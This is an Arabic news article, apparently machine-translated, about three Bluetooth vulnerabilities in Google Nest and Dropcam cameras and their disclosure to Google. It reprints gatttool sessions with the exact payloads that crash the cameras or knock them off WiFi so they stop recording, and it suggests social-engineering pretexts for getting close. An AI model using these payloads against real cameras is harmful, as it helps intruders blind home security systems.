لا يوفر الذكاء الاصطناعي لاكتشاف الأشخاص Google AI Nest Outdoor Cam من القرصنة السهلةالحماية الأكثر تقنيًا ليست دائمًا الأفضل. بإضافة التعقيد إلى النظام ، يمكنك إضافة ناقلات هجوم جديدة. يحدث أنه من الأسهل على الخاطفين سرقة
السيارات الأكثر تكلفة وحديثة
باستخدام مفاتيح الراديو من "الأشياء الحديدية" القديمة. حول الشيء نفسه مع الأمن في مناطق أخرى.
ضحية أخرى من المفرقعات كانت كاميرات المراقبة الرائعة من Google Nest - موديلات Dropcam و Dropcam Pro و Nest Cam Outdoor و Nest Cam. تم بالفعل
نشر رمز القرصنة
على GitHub ، ولم تقم Google بعد بإصدار تصحيحات. يمكنك ممارسة إيقاف تشغيل كاميرات المراقبة الخاصة بك اليوم (لك بالطبع).
تم نشر معلومات عن ثلاث نقاط ضعف ، وكلها توفر الاتصال بالكاميرا عبر Bluetooth 4.0 LE (وفقًا للمواصفات ، النطاق حوالي 100 م). تعمل البلوتوث دائمًا في هذه الكاميرات ، أي أنه من المستحيل عمومًا إيقاف تشغيله حتى للمالك.
تتمثل الثغرة الأولى في تجاوز سعة المخزن المؤقت مع خيار SSID عبر البلوتوث. للتسبب في تجاوز سعة المخزن المؤقت ، تحتاج إلى محاولة تعيين معلمة SSID جديدة ذات خصائص غير صحيحة على الكاميرا.
فيما يلي مثال على الاتصال بالكاميرا وتعيين طول SSID من 1 و 16 بايت في المرة الواحدة.
anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a031201AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.
ونتيجة لذلك ، سيتم إيقاف تشغيل الكاميرا ، وإعادة التشغيل بعد حدوث خطأ ، والعودة إلى حالة التشغيل العادية.
الثغرة الثانية مماثلة للثغرة الأولى ، وهنا فقط يحدث تجاوز سعة المخزن المؤقت عن طريق إرسال كلمة مرور بطول غير صحيح (في هذه الحالة ، ثلاثة بايت و بايت واحد). والنتيجة هي نفسها - تتم إعادة تشغيل الكاميرا بعد حدوث خطأ مع العودة إلى حالة العمل.
anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b506574536d6172742d356e1a01AAAAAA
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.
الثغرة الثالثة أكثر إثارة للاهتمام. يسمح لك بفصل الكاميرا مؤقتًا عن شبكة WiFi ، وتمريرها بمعرف SSID جديد للاتصال. في هذه الكاميرات ، لا يتوفر الفيديو المحلي ، لذلك تنقل الكاميرا كل شيء عبر WiFi - يتم تخزين الأرشيف بأكمله في الخدمة السحابية. وفقًا لذلك ، أثناء قطع الاتصال بالشبكة ، لن يتم حفظ تسجيل الفيديو. تستغرق الكاميرا حوالي 60-90 ثانية للعودة إلى الخدمة بعد هذا الاختراق واستئناف تسجيل الفيديو. من حيث المبدأ ، هذه ليست فترة زمنية طويلة ، ولكن يمكن اختراق القرصنة لفترة زمنية ضرورية.
anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b0a6574536d6172742d356e1a20232320
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3becb824ba437c13233ac2ff78b1776456e47a01
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3ca5787d2f5e53f394a512200228003210bc9253
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3d48cada7a0d921d57b2d26ae89c3a04DEADBEEF
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3e
Characteristic value was written successfully
Characteristic value was written successfully
Characteristic value was written successfully
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>
لاحظ أنه في جميع الأمثلة للاتصال بالكاميرا ، تحتاج إلى معرفة عنوان MAC الخاص بها (18: B4: 30: 5D: 00: B8). إنه مكتوب ببساطة على جسم الكاميرا ، لذلك في الممارسة العملية للقرصنة عليك أولاً الاقتراب من الكاميرا على مسافة قريبة إلى حد ما. على سبيل المثال ، تحت غطاء جزازة العشب أو مصلح أو صديق الضحية المستقبلية.
تظهر إحدى صور كاميرا Nest Outdoor Cam أن عنوان MAC مكتوب على جسم الكاميرا (السطر فوق رمز QR). قام المطورون بإخفائها بحكمة خلف كابل طاقةتوجد ثلاث نقاط ضعف في الكاميرات في أحدث البرامج الثابتة للكاميرا (5.2.1). وجدهم متخصص الأمن جايسون دويل في الخريف الماضي. يقول إنه أبلغ Google في 26 أكتوبر 2016 ، لذا يبدو الآن أن وقت الكشف قد حان للجميع. هذه ممارسة قياسية إذا لم تكن الشركة المصنعة في عجلة من أمرها أو لم يكن لديها الوقت لإصلاح الخلل في غضون فترة زمنية معقولة. في هذه الحالة ، مرت خمسة أشهر تقريبا.
تدفع Google عادةً للباحثين مكافآت مقابل العثور على الثغرات الأمنية في منتجاتهم. تمتد
مكافأة الثغرات الأمنية من Google أيضًا إلى كاميرات الفيديو من Nest. صحيح أن Nest في المرتبة الثالثة من حيث المكانة المرموقة ، حيث يبلغ الحد الأقصى للمكافأة 5000 دولار فقط (بالنسبة لبقية المنتجات - 31337 دولارًا). بالإضافة إلى ذلك ، في هذه الفئة الثالثة ، هناك ملاحظة خاصة حول فترة ستة أشهر من الصمت. على الرغم من أن Google نفسها كشفت مؤخرًا عن 0 يوم المستغل بنشاط على Windows و Edge بعد 90 يومًا (
1 ،
2 ).
لم يتمكن جايسون دويل من تحمل فترة الستة أشهر (26 أكتوبر - 17 مارس) ، لذلك لن يتمكن من المطالبة بالجائزة. على عكس الممارسة المعتادة ، لم تبلغ Google الباحث بالمواعيد النهائية لإغلاق الثغرة ولم تدعم المراسلات معه. في الوقت نفسه ،
أخبر مصدر مطلع على الوضع
The Register أن التصحيح كان جاهزًا تقريبًا ، لذلك لم يكن جايسون يتحمل الكثير من مكافأته.
بالمناسبة ، بعض كاميرات المراقبة المشابهة الأخرى تقوم بإيقاف تشغيل Bluetooth عند إنشاء اتصال WiFi ، لذلك لن تتمكن من الاختراق بهذه الطريقة (على سبيل المثال ، Logitech Circle). تستطيع Google أيضًا اتباع هذه الحيلة البسيطة للتخلص من هذا النوع من الثغرات الأمنية.